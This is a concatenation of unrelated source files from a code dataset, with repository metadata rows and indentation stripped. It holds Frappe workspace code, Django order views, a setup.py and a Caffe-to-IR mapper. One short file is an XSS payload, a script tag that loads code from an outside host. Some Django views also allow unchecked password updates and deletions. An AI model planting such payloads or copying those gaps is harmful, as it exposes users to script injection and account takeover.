return wrapper
class Workspace:
def __init__(self, page_name, minimal=False):
self.page_name = page_name
self.extended_cards = []
self.extended_charts = []
self.extended_shortcuts = []
self.user = frappe.get_user()
self.allowed_modules = self.get_cached('user_allowed_modules', self.get_allowed_modules)
self.doc = self.get_page_for_user()
if self.doc.module not in self.allowed_modules:
raise frappe.PermissionError
self.can_read = self.get_cached('user_perm_can_read', self.get_can_read_items)
self.allowed_pages = get_allowed_pages(cache=True)
self.allowed_reports = get_allowed_reports(cache=True)
if not minimal:
self.onboarding_doc = self.get_onboarding_doc()
self.onboarding = None
self.table_counts = get_table_with_counts()
self.restricted_doctypes = frappe.cache().get_value("domain_restricted_doctypes") or build_domain_restriced_doctype_cache()
self.restricted_pages = frappe.cache().get_value("domain_restricted_pages") or build_domain_restriced_page_cache()
def is_page_allowed(self):
cards = self.doc.cards + get_custom_reports_and_doctypes(self.doc.module) + self.extended_cards
shortcuts = self.doc.shortcuts + self.extended_shortcuts
for section in cards:
links = loads(section.links) if isinstance(section.links, string_types) else section.links
for item in links:
if self.is_item_allowed(item.get('name'), item.get('type')):
return True
def _in_active_domains(item):
if not item.restrict_to_domain:
return True
else:
return item.restrict_to_domain in frappe.get_active_domains()
for item in shortcuts:
if self.is_item_allowed(item.link_to, item.type) and _in_active_domains(item):
return True
return False
def get_cached(self, cache_key, fallback_fn):
_cache = frappe.cache()
value = _cache.get_value(cache_key, user=frappe.session.user)
if value:
return value
value = fallback_fn()
# Expire every six hour
_cache.set_value(cache_key, value, frappe.session.user, 21600)
return value
def get_can_read_items(self):
if not self.user.can_read:
self.user.build_permissions()
return self.user.can_read
def get_allowed_modules(self):
if not self.user.allow_modules:
self.user.build_permissions()
return self.user.allow_modules
def get_page_for_user(self):
filters = {
'extends': self.page_name,
'for_user': frappe.session.user
}
pages = frappe.get_all("Desk Page", filters=filters, limit=1)
if pages:
return frappe.get_cached_doc("Desk Page", pages[0])
self.get_pages_to_extend()
return frappe.get_cached_doc("Desk Page", self.page_name)
def get_onboarding_doc(self):
# Check if onboarding is enabled
if not frappe.get_system_settings("enable_onboarding"):
return None
if not self.doc.onboarding:
return None
if frappe.db.get_value("Module Onboarding", self.doc.onboarding, "is_complete"):
return None
doc = frappe.get_doc("Module Onboarding", self.doc.onboarding)
# Check if user is allowed
allowed_roles = set(doc.get_allowed_roles())
user_roles = set(frappe.get_roles())
if not allowed_roles & user_roles:
return None
# Check if already complete
if doc.check_completion():
return None
return doc
def get_pages_to_extend(self):
pages = frappe.get_all("Desk Page", filters={
"extends": self.page_name,
'restrict_to_domain': ['in', frappe.get_active_domains()],
'for_user': '',
'module': ['in', self.allowed_modules]
})
pages = [frappe.get_cached_doc("Desk Page", page['name']) for page in pages]
for page in pages:
self.extended_cards = self.extended_cards + page.cards
self.extended_charts = self.extended_charts + page.charts
self.extended_shortcuts = self.extended_shortcuts + page.shortcuts
def is_item_allowed(self, name, item_type):
item_type = item_type.lower()
if item_type == "doctype":
return (name in self.can_read and name in self.restricted_doctypes)
if item_type == "page":
return (name in self.allowed_pages and name in self.restricted_pages)
if item_type == "report":
return name in self.allowed_reports
if item_type == "help":
return True
if item_type == "dashboard":
return True
return False
def build_workspace(self):
self.cards = {
'label': _(self.doc.cards_label),
'items': self.get_cards()
}
self.charts = {
'label': _(self.doc.charts_label),
'items': self.get_charts()
}
self.shortcuts = {
'label': _(self.doc.shortcuts_label),
'items': self.get_shortcuts()
}
if self.onboarding_doc:
self.onboarding = {
'label': _(self.onboarding_doc.title),
'subtitle': _(self.onboarding_doc.subtitle),
'success': _(self.onboarding_doc.success_message),
'docs_url': self.onboarding_doc.documentation_url,
'items': self.get_onboarding_steps()
}
@handle_not_exist
def get_cards(self):
cards = self.doc.cards
if not self.doc.hide_custom:
cards = cards + get_custom_reports_and_doctypes(self.doc.module)
if len(self.extended_cards):
cards = merge_cards_based_on_label(cards + self.extended_cards)
default_country = frappe.db.get_default("country")
def _doctype_contains_a_record(name):
exists = self.table_counts.get(name, None)
if not exists:
if not frappe.db.get_value('DocType', name, 'issingle'):
exists = frappe.db.count(name)
else:
exists = True
self.table_counts[name] = exists
return exists
def _prepare_item(item):
if item.dependencies:
incomplete_dependencies = [d for d in item.dependencies if not _doctype_contains_a_record(d)]
if len(incomplete_dependencies):
item.incomplete_dependencies = incomplete_dependencies
else:
item.incomplete_dependencies = ""
if item.onboard:
# Mark Spotlights for initial
if item.get("type") == "doctype":
name = item.get("name")
count = _doctype_contains_a_record(name)
item["count"] = count
# Translate label
item["label"] = _(item.label) if item.label else _(item.name)
return item
new_data = []
for section in cards:
new_items = []
if isinstance(section.links, string_types):
links = loads(section.links)
else:
links = section.links
for item in links:
item = _dict(item)
# Condition: based on country
if item.country and item.country != default_country:
continue
# Check if user is allowed to view
if self.is_item_allowed(item.name, item.type):
prepared_item = _prepare_item(item)
new_items.append(prepared_item)
if new_items:
if isinstance(section, _dict):
new_section = section.copy()
else:
new_section = section.as_dict().copy()
new_section["links"] = new_items
new_section["label"] = _(new_section["label"])
new_data.append(new_section)
return new_data
@handle_not_exist
def get_charts(self):
all_charts = []
if frappe.has_permission("Dashboard Chart", throw=False):
charts = self.doc.charts
if len(self.extended_charts):
charts = charts + self.extended_charts
for chart in charts:
if frappe.has_permission('Dashboard Chart', doc=chart.chart_name):
# Translate label
chart.label = _(chart.label) if chart.label else _(chart.chart_name)
all_charts.append(chart)
return all_charts
@handle_not_exist
def get_shortcuts(self):
def _in_active_domains(item):
if not item.restrict_to_domain:
return True
else:
return item.restrict_to_domain in frappe.get_active_domains()
items = []
shortcuts = self.doc.shortcuts
if len(self.extended_shortcuts):
shortcuts = shortcuts + self.extended_shortcuts
for item in shortcuts:
new_item = item.as_dict().copy()
if self.is_item_allowed(item.link_to, item.type) and _in_active_domains(item):
if item.type == "Report":
report = self.allowed_reports.get(item.link_to, {})
if report.get("report_type") in ["Query Report", "Script Report", "Custom Report"]:
new_item['is_query_report'] = 1
else:
new_item['ref_doctype'] = report.get('ref_doctype')
# Translate label
new_item["label"] = _(item.label) if item.label else _(item.link_to)
items.append(new_item)
return items
@handle_not_exist
def get_onboarding_steps(self):
steps = []
for doc in self.onboarding_doc.get_steps():
step = doc.as_dict().copy()
step.label = _(doc.title)
if step.action == "Create Entry":
step.is_submittable = frappe.db.get_value("DocType", step.reference_document, 'is_submittable', cache=True)
steps.append(step)
return steps
@frappe.whitelist()
@frappe.read_only()
def get_desktop_page(page):
"""Applies permissions, customizations and returns the configruration for a page
on desk.
Args:
page (string): page name
Returns:
dict: dictionary of cards, charts and shortcuts to be displayed on website
"""
wspace = Workspace(page)
wspace.build_workspace()
return {
'charts': wspace.charts,
'shortcuts': wspace.shortcuts,
'cards': wspace.cards,
'onboarding': wspace.onboarding,
'allow_customization': not wspace.doc.disable_user_customization
}
@frappe.whitelist()
def get_desk_sidebar_items(flatten=False, cache=True):
"""Get list of sidebar items for desk
"""
pages = []
_cache = frappe.cache()
if cache:
pages = _cache.get_value("desk_sidebar_items", user=frappe.session.user)
if not pages or not cache:
# don't get domain restricted pages
blocked_modules = frappe.get_doc('User', frappe.session.user).get_blocked_modules()
filters = {
'restrict_to_domain': ['in', frappe.get_active_domains()],
'extends_another_page': 0,
'for_user': '',
'module': ['not in', blocked_modules]
}
if not frappe.local.conf.developer_mode:
filters['developer_mode_only'] = '0'
# pages sorted based on pinned to top and then by name
order_by = "pin_to_top desc, pin_to_bottom asc, name asc"
all_pages = frappe.get_all("Desk Page", fields=["name", "category"], filters=filters, order_by=order_by, ignore_permissions=True)
pages = []
# Filter Page based on Permission
for page in all_pages:
try:
wspace = Workspace(page.get('name'), True)
if wspace.is_page_allowed():
pages.append(page)
except frappe.PermissionError:
pass
_cache.set_value("desk_sidebar_items", pages, frappe.session.user)
if flatten:
return pages
from collections import defaultdict
sidebar_items = defaultdict(list)
# The order will be maintained while categorizing
for page in pages:
# Translate label
page['label'] = _(page.get('name'))
sidebar_items[page["category"]].append(page)
return sidebar_items
def get_table_with_counts():
counts = frappe.cache().get_value("information_schema:counts")
if not counts:
counts = build_table_count_cache()
return counts
def get_custom_reports_and_doctypes(module):
return [
_dict({
"label": _("Custom Documents"),
"links": get_custom_doctype_list(module)
}),
_dict({
"label": _("Custom Reports"),
"links": get_custom_report_list(module)
}),
]
def get_custom_doctype_list(module):
doctypes = frappe.get_all("DocType", fields=["name"], filters={"custom": 1, "istable": 0, "module": module}, order_by="name")
out = []
for d in doctypes:
out.append({
"type": "doctype",
"name": d.name,
"label": _(d.name)
})
return out
def get_custom_report_list(module):
"""Returns list on new style reports for modules."""
reports = frappe.get_all("Report", fields=["name", "ref_doctype", "report_type"], filters=
{"is_standard": "No", "disabled": 0, "module": module},
order_by="name")
out = []
for r in reports:
out.append({
"type": "report",
"doctype": r.ref_doctype,
"is_query_report": 1 if r.report_type in ("Query Report", "Script Report", "Custom Report") else 0,
"label": _(r.name),
"name": r.name
})
return out
def get_custom_workspace_for_user(page):
"""Get custom page from desk_page if exists or create one
Args:
page (stirng): Page name
Returns:
Object: Document object
"""
filters = {
'extends': page,
'for_user': frappe.session.user
}
pages = frappe.get_list("Desk Page", filters=filters)
if pages:
return frappe.get_doc("Desk Page", pages[0])
doc = frappe.new_doc("Desk Page")
doc.extends = page
doc.for_user = frappe.session.user
return doc
@frappe.whitelist()
def save_customization(page, config):
"""Save customizations as a separate doctype in Desk page per user
Args:
page (string): Name of the page to be edited
config (dict): Dictionary config of al widgets
Returns:
Boolean: Customization saving status
"""
original_page = frappe.get_doc("Desk Page", page)
page_doc = get_custom_workspace_for_user(page)
# Update field values
page_doc.update({
"charts_label": original_page.charts_label,
"cards_label": original_page.cards_label,
"shortcuts_label": original_page.shortcuts_label,
"module": original_page.module,
"onboarding": original_page.onboarding,
"developer_mode_only": original_page.developer_mode_only,
"category": original_page.category
})
config = _dict(loads(config))
if config.charts:
page_doc.charts = prepare_widget(config.charts, "Desk Chart", "charts")
if config.shortcuts:
page_doc.shortcuts = prepare_widget(config.shortcuts, "Desk Shortcut", "shortcuts")
if config.cards:
page_doc.cards = prepare_widget(config.cards, "Desk Card", "cards")
# Set label
page_doc.label = page + '-' + frappe.session.user
try:
if page_doc.is_new():
page_doc.insert(ignore_permissions=True)
else:
page_doc.save(ignore_permissions=True)
except (ValidationError, TypeError) as e:
# Create a json string to log
json_config = dumps(config, sort_keys=True, indent=4)
# Error log body
log = \
"""
page: {0}
config: {1}
exception: {2}
""".format(page, json_config, e)
frappe.log_error(log, _("Could not save customization"))
return False
return True
def prepare_widget(config, doctype, parentfield):
"""Create widget child table entries with parent details
Args:
config (dict): Dictionary containing widget config
doctype (string): Doctype name of the child table
parentfield (string): Parent field for the child table
Returns:
TYPE: List of Document objects
"""
if not config:
return []
order = config.get('order')
widgets = config.get('widgets')
prepare_widget_list = []
for idx, name in enumerate(order):
wid_config = widgets[name].copy()
# Some cleanup
wid_config.pop("name", None)
# New Doc
doc = frappe.new_doc(doctype)
doc.update(wid_config)
# Manually Set IDX
doc.idx = idx + 1
# Set Parent Field
doc.parentfield = parentfield
prepare_widget_list.append(doc)
return prepare_widget_list
@frappe.whitelist()
def update_onboarding_step(name, field, value):
"""Update status of onboaridng step
Args:
name (string): Name of the doc
field (string): field to be updated
value: Value to be updated
"""
frappe.db.set_value("Onboarding Step", name, field, value)
def merge_cards_based_on_label(cards):
"""Merge cards with common label."""
cards_dict = {}
for card in cards:
if card.label in cards_dict:
links = loads(cards_dict[card.label].links) + loads(card.links)
cards_dict[card.label].update(dict(links=dumps(links)))
cards_dict[card.label] = cards_dict.pop(card.label)
else:
cards_dict[card.label] = card
return list(cards_dict.values())
| 27.074074
| 131
| 0.719811
|
05a448d530b35f473a11bfc66ad6776b9ca3615b
| 121
|
py
|
Python
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 18
|
2022-02-20T13:27:36.000Z
|
2022-03-23T21:35:13.000Z
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 1
|
2022-02-20T13:37:20.000Z
|
2022-02-21T14:38:26.000Z
|
payloads/shortest.py
|
redcode-labs/poXSSon
|
7046fac15e54e05a73d7d46a00916161d9f36cca
|
[
"ISC"
] | 2
|
2022-02-20T13:35:56.000Z
|
2022-02-21T11:59:15.000Z
|
#!/usr/bin/python3
name="shortest"
description="The shortest payload for XSS injection"
payload = "<script src=//14.rs>"
| 30.25
| 52
| 0.735537
|
89de9b64d48de702f4dc73bea63175b43791f4b7
| 12,702
|
py
|
Python
|
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | 15
|
2016-08-03T08:11:36.000Z
|
2022-03-24T03:21:06.000Z
|
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | null | null | null |
backend/takeout/customer/views.py
|
BillBillBillBill/laughing-garbanzo
|
27c66dcc4f0e045ae060255679a2aa68c0f744d2
|
[
"MIT"
] | 7
|
2016-08-03T08:11:38.000Z
|
2020-12-27T08:49:10.000Z
|
# coding: utf-8
from rest_framework.views import APIView
from models.customer import Customer, DeliveryInformation
from models.order import Order, OrderFood
from models.complaint import Complaint
from bussiness.models.store import Store
from bussiness.models.food import Food
from lib.models.review import FoodReview, OrderReview
from lib.utils.response import JsonResponse, JsonErrorResponse
from lib.utils.misc import get_update_dict_by_list
from lib.utils.token_tools import get_token
class CustomerList(APIView):
def get(self, request):
# 获取买家列表
customers = [customer.to_string() for customer in Customer.objects.all()]
return JsonResponse({"customer_list": customers})
def post(self, request):
# 注册
username = request.json.get("username")
password = request.json.get("password")
nickname = request.json.get("nickname")
account_type = request.json.get("account_type")
if not all([username, password, nickname, account_type]):
return JsonErrorResponse("username, password, nickname, account_type are needed", 400)
new_customer = Customer(
username=username,
password=password,
nickname=nickname,
account_type=account_type
)
try:
new_customer.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新注册顾客id:", new_customer.id
# 登陆
token = get_token(username, password, "customer")
return JsonResponse({
"id": new_customer.id,
"token": token
})
class CustomerDetail(APIView):
def get(self, request, customer_id):
try:
customer = Customer.objects.get(id=customer_id)
except Customer.DoesNotExist:
return JsonErrorResponse("Customer does not exist", 404)
return JsonResponse({"customer": customer.to_detail_string()})
def put(self, request, customer_id):
# 更新个人信息
update_item = ['nickname', 'password']
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = Customer.objects.filter(id=customer_id).update(**update_dict)
if modify_num == 1:
return JsonResponse({})
return JsonErrorResponse("Update failed", 400)
# 收货信息
class DeliveryInformationList(APIView):
def get(self, request):
# 获取收货信息列表
customer = request.u
if not customer:
return JsonErrorResponse("can't find customer", 404)
delivery_informations = [delivery_information.to_string() for delivery_information in customer.delivery_informations.all()]
return JsonResponse({"delivery_information_list": delivery_informations})
def post(self, request):
# 添加收货信息
owner = request.u
address = request.json.get("address")
phone = request.json.get("phone")
receiver = request.json.get("receiver")
if not all([address, phone, receiver]):
return JsonErrorResponse("address, phone, receiver are needed", 400)
new_delivery_information = DeliveryInformation(
address=address,
phone=phone,
receiver=receiver,
customer=owner,
)
try:
new_delivery_information.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新收货信息id:", new_delivery_information.id
return JsonResponse({"id": new_delivery_information.id})
class DeliveryInformationDetail(APIView):
def get(self, request, delivery_information_id):
try:
delivery_information = DeliveryInformation.objects.get(id=delivery_information_id)
except DeliveryInformation.DoesNotExist:
return JsonErrorResponse("DeliveryInformation does not exist", 404)
return JsonResponse({"delivery_information": delivery_information.to_detail_string()})
def put(self, request, delivery_information_id):
# 更新收货信息
try:
owner = request.u
update_item = ['address', 'phone', 'receiver']
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = owner.delivery_informations.filter(id=delivery_information_id).update(**update_dict)
assert modify_num == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
def delete(self, request, delivery_information_id):
# 删除食品
try:
result = DeliveryInformation.objects.get(id=delivery_information_id).delete()
assert result[0] == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Delete failed:" + e.message, 400)
# 投诉
class ComplaintList(APIView):
def get(self, request):
# 获取投诉列表
account_type = request.account_type
if account_type == "admin":
complaints = [complaint.to_string() for complaint in Complaint.objects.all()]
return JsonResponse({"complaint_list": complaints})
customer = request.u
if not customer:
return JsonErrorResponse("can't find customer", 404)
complaints = [complaint.to_string() for complaint in customer.complaints.all()]
return JsonResponse({"complaint_list": complaints})
def post(self, request):
# 添加投诉
try:
owner = request.u
content = request.json.get("content")
store_id = request.json.get("store_id")
store = Store.objects.get(id=store_id)
if not all([content, store]):
return JsonErrorResponse("content, store_id are needed", 400)
new_complaint = Complaint(
content=content,
store=store,
customer=owner,
)
new_complaint.save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新投诉id:", new_complaint.id
return JsonResponse({"id": new_complaint.id})
class ComplaintDetail(APIView):
def get(self, request, complaint_id):
try:
complaint = Complaint.objects.get(id=complaint_id)
except Complaint.DoesNotExist:
return JsonErrorResponse("Complaint does not exist", 404)
return JsonResponse({"complaint": complaint.to_detail_string()})
def put(self, request, complaint_id):
# 更新投诉
try:
update_item = ['status']
status = request.json.get("status")
assert status in map(lambda i: i[0], Complaint.StatusList), "not valid"
update_dict = get_update_dict_by_list(update_item, request.json)
modify_num = Complaint.objects.filter(id=complaint_id).update(**update_dict)
assert modify_num == 1
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
# 订单
class OrderList(APIView):
def get(self, request):
# 获取订单列表
owner = request.u
account_type = request.account_type
if not owner:
return JsonErrorResponse("can't find user", 404)
if account_type != "customer" and account_type != "bussiness":
return JsonErrorResponse("wrong account type", 403)
if account_type == "customer":
orders = [order.to_string() for order in owner.orders.all()]
else:
orders = [order.to_string() for order in owner.store.orders.all()]
return JsonResponse({"order_list": orders})
def post(self, request):
# 添加订单
try:
customer = request.u
note = request.json.get("note")
delivery_information_id = request.json.get("delivery_information_id")
store_id = request.json.get("store_id")
food_list = request.json.get("food_list")
store = Store.objects.get(id=store_id)
total_price = 0
if not all([food_list, delivery_information_id, store]):
return JsonErrorResponse("food_list, delivery_information_id, store_id are needed", 400)
# 检查food_list
assert isinstance(food_list, list) and len(food_list) > 0, "food_list format wrong"
# 检查库存+计算价格
for order_food in food_list:
food = store.foods.get(id=order_food['food_id'])
food_count = int(order_food['count'])
total_price += food.price * food_count
assert food.stock > food_count, "food stock is not enough"
# 检查收货信息
delivery_information = customer.delivery_informations.get(id=delivery_information_id)
# 检查账户类型
assert request.account_type == "customer", "only customer can make order"
# 创建order
new_order = Order(
note=note,
total_price=total_price,
customer=customer,
store=store,
delivery_information=delivery_information
)
new_order.save()
# 减少库存,创建order_food
for order_food in food_list:
food = store.foods.get(id=order_food['food_id'])
food_count = int(order_food['count'])
new_stock = food.stock - food_count
store.foods.filter(id=order_food['food_id']).update(stock=new_stock)
OrderFood(
count=food_count,
food=food,
order=new_order
).save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新订单id:", new_order.id
return JsonResponse({"id": new_order.id})
class OrderDetail(APIView):
def get(self, request, order_id):
try:
order = Order.objects.get(id=order_id)
except Order.DoesNotExist:
return JsonErrorResponse("Order does not exist", 404)
return JsonResponse({"order": order.to_detail_string()})
def put(self, request, order_id):
# 更新订单
try:
action = request.json.get("action")
order = Order.objects.get(id=order_id)
status = order.status
if request.account_type == "customer":
action_to_func = {"finish": order.finish}
else:
action_to_func = {
"accept": order.accept,
"transport": order.transport,
"close": order.close,
}
if action not in action_to_func:
return JsonErrorResponse("fail to action on order", 400)
action_to_func[action]()
# 评论商品和订单 只允许一次
if action == "finish" and status == "3":
order_foods = order.order_foods.all()
order_foods_food = [i.food for i in order_foods]
food_review_list = request.json.get("food_review_list", [])
# 商品评论
data = {}
data['customer'] = request.u
data['order'] = order
for food_review in food_review_list:
try:
food = Food.objects.get(id = food_review.get("food_id"))
assert food in order_foods_food
data['food'] = food
data['content'] = food_review.get("content", "")
data['star'] = food_review.get("star", "5")
new_food_review = FoodReview(**data)
new_food_review.save()
except Exception, e:
print e.message
# 订单评论
order_review = request.json.get("order_review")
data['store'] = order.store
if order_review:
if data.get('food'):
data.pop('food')
data['delivery_time'] = order_review.get("delivery_time", 120)
data['content'] = order_review.get("content", "")
data['star'] = order_review.get("star", "5")
new_order_review = OrderReview(**data)
new_order_review.save()
order_review = request.json.get("order_review")
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
| 39.570093
| 131
| 0.589356
|
78848376fd6712e18d054790fa8e70f6da87ea23
| 1,789
|
py
|
Python
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 42
|
2019-05-14T19:04:38.000Z
|
2022-03-06T12:57:00.000Z
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 16
|
2020-08-04T12:34:08.000Z
|
2022-03-31T22:30:48.000Z
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 6
|
2019-05-13T15:57:03.000Z
|
2022-03-18T02:17:05.000Z
|
import os
import sys
from setuptools import setup, find_packages
install_requires = [
"Cython>=0.29.17",
"quadprog>=0.1.6",
"numpy>=1.17.1",
"scikit-learn>=0.22.2.post1",
"scipy>=1.3.1",
"pandas>=0.23.4",
"dill>=0.3.1.1",
"h5py>=2.10.0",
"anndata>=0.7.1",
"matplotlib",
"pygraphviz"
]
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >=3.6 required.")
with open("README.rst", "r", encoding="utf-8") as fh:
readme = fh.read()
setup(
name="cello_classify",
version="2.0.3",
description="CellO",
author="Matthew N. Bernstein",
author_email="mbernstein@morgridge.org",
packages=[
"cello",
"cello.onto_lib_py3",
"cello.models",
"cello.graph_lib"
],
license="MIT License",
install_requires=install_requires,
long_description=readme,
include_package_data=True,
zip_safe=True,
url="https://github.com/deweylab/CellO",
entry_points={
'console_scripts': [
'cello_predict = cello.cello_predict:main',
'cello_train_model = cello.cello_train_model:main',
'cello_quantify_sample = cello.cello_quantify_sample:main'
]
},
keywords=[
"scRNA-seq",
"cell-type",
"cell-ontology",
"gene-expression",
"computational-biology",
],
classifiers=[
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Natural Language :: English",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Topic :: Scientific/Engineering :: Bio-Informatics",
]
)
| 25.557143
| 70
| 0.588038
|
700607a0e3bc6a40eaa5af9ff3733a5abb9bcc35
| 9,760
|
py
|
Python
|
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
import numpy as np
from mmdnn.conversion.caffe.errors import ConversionError
from mmdnn.conversion.caffe.common_graph import Node
from mmdnn.conversion.caffe.network import DEFAULT_PADDING
from mmdnn.conversion.caffe.utils import get_lower_case
from mmdnn.conversion.common.IR.graph_pb2 import TensorShape
def get_handler_name(node_kind):
return node_kind.lower() if len(node_kind) <= 4 else get_lower_case(node_kind)
class NodeMapper(object):
@classmethod
def _convert_output_shape(cls, kwargs, node):
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
if len(node.output_shape) > 2:
for i in node.output_shape[2:]:
dim = shape.dim.add()
dim.size = i
dim = shape.dim.add()
dim.size = node.output_shape.channels
else:
dim = shape.dim.add()
dim.size = node.output_shape[1]
kwargs['_output_shapes'] = [shape]
@classmethod
def get_kernel_params(cls, node, input_shape):
kwargs = {}
if node.kernel_parameters.global_pooling:
kwargs['kernel_shape'] = [1, input_shape.height, input_shape.width, 1]
kwargs['pads'] = [0] * 8
else:
from mmdnn.conversion.caffe.graph import NodeKind
if node.kind == NodeKind.Pooling:
kwargs['kernel_shape'] = [1, node.kernel_parameters.k_h, node.kernel_parameters.k_w, 1]
elif node.kind in [NodeKind.Convolution, NodeKind.Deconvolution]:
pass
else:
raise ValueError
dilation = node.parameters.dilation[0] if hasattr(node.parameters, 'dilation') and node.parameters.dilation else 1
o_h_caffe = node.output_shape.height
o_w_caffe = node.output_shape.width
ko_h = dilation * (int(node.kernel_parameters.k_h) - 1) + 1
ko_w = dilation * (int(node.kernel_parameters.k_w) - 1) + 1
if node.kind == NodeKind.Deconvolution:
o_h_tf = int(node.kernel_parameters.s_h) * (input_shape.height - 1) + ko_h - 2 * int(node.kernel_parameters.p_h)
o_w_tf = int(node.kernel_parameters.s_w) * (input_shape.width - 1) + ko_w - 2 * int(node.kernel_parameters.p_w)
else:
o_h_tf = (input_shape.height + node.kernel_parameters.p_h * 2 - ko_h + 1) // node.kernel_parameters.s_h
o_w_tf = (input_shape.width + node.kernel_parameters.p_w * 2 - ko_w + 1) // node.kernel_parameters.s_w
kwargs['pads'] = [0, node.kernel_parameters.p_h, node.kernel_parameters.p_w, 0] + \
[0, node.kernel_parameters.p_h + o_h_caffe - o_h_tf, node.kernel_parameters.p_w + o_w_caffe - o_w_tf, 0]
kwargs['strides'] = [1, node.kernel_parameters.s_h, node.kernel_parameters.s_w, 1]
cls._convert_output_shape(kwargs, node)
return kwargs
@classmethod
def map_data(cls, node):
# TODO: We need to identify whether this is 4D image data, otherwise we shouldn't change the dimension order
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
for i in node.output_shape[2:]:
dim = shape.dim.add()
dim.size = i
dim = shape.dim.add()
dim.size = node.output_shape.channels
kwargs = {'shape': shape} # Ignore the dimension of batch size
cls._convert_output_shape(kwargs, node)
return Node.create('DataInput', **kwargs)
@classmethod
def map_input(cls, node):
return cls.map_data(node)
@classmethod
def map_convolution(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
kwargs['kernel_shape'] = [node.kernel_parameters.k_h, node.kernel_parameters.k_w, parent.output_shape.channels, node.parameters.num_output]
kwargs['use_bias'] = node.parameters.bias_term
if node.parameters.dilation:
dilation = node.parameters.dilation[0]
if dilation != 1:
kwargs['dilations'] = [1, dilation, dilation, 1]
kwargs['group'] = node.parameters.group
return Node.create('Conv', **kwargs)
@classmethod
def map_deconvolution(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
kwargs['kernel_shape'] = [node.kernel_parameters.k_h, node.kernel_parameters.k_w, node.parameters.num_output, parent.output_shape.channels]
kwargs['use_bias'] = node.parameters.bias_term
if node.parameters.dilation:
dilation = node.parameters.dilation[0]
if dilation != 1:
kwargs['dilations'] = [1, dilation, dilation, 1]
kwargs['group'] = node.parameters.group
return Node.create('ConvTranspose', **kwargs)
@classmethod
def map_crop(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
offset = node.parameters.offset
if offset:
if len(offset) == 1:
kwargs['border'] = [offset[0], offset[0], 0, 0]
else:
kwargs['border'] = [offset[0], offset[1], 0, 0]
return Node.create('Crop', **kwargs)
@classmethod
def map_relu(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
return Node.create('Relu', **kwargs)
@classmethod
def map_p_re_lu(cls, node):
# print(node.parameters)
# assert False
kwargs = {}
# kwargs['gamma'] = 0.25
cls._convert_output_shape(kwargs, node)
return Node.create('PRelu', **kwargs)
@classmethod
def map_pooling(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
if node.parameters.pool == 0:
kwargs['pooling_type'] = 'MAX'
elif node.parameters.pool == 1:
kwargs['pooling_type'] = 'AVG'
else:
# Stochastic pooling, for instance.
raise ConversionError('Unsupported pooling type.')
cls._convert_output_shape(kwargs, node)
return Node.create('Pool', **kwargs)
@classmethod
def _add_flatten_layer(cls, node):
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
dim = shape.dim.add()
dim.size = 1
for i in node.output_shape[1:]:
dim.size *= i
kwargs = {'_output_shapes' : [shape]}
return Node.create('Flatten', **kwargs)
@classmethod
def map_inner_product(cls, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
kwargs = {'use_bias' : node.parameters.bias_term, 'units' : node.parameters.num_output}
# check if need the Flatten layer
parent, _ = node.get_only_parent()
ret = []
# if parent.output_shape.height > 1 or parent.output_shape.width > 1:
ret.append(cls._add_flatten_layer(parent))
ret.append(Node.create('FullyConnected', **kwargs))
return ret
@classmethod
def map_softmax(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
return Node.create('Softmax', **kwargs)
@classmethod
def map_lrn(cls, node):
params = node.parameters
assert params.local_size % 2 == 1
kwargs = {'size': int((params.local_size + 1) / 2), 'alpha': params.alpha, 'beta': params.beta, 'k' : params.k}
cls._convert_output_shape(kwargs, node)
return Node.create('LRN', **kwargs)
@classmethod
def map_concat(cls, node):
kwargs = {'axis': (2, 3, 1, 0)[node.parameters.axis]}
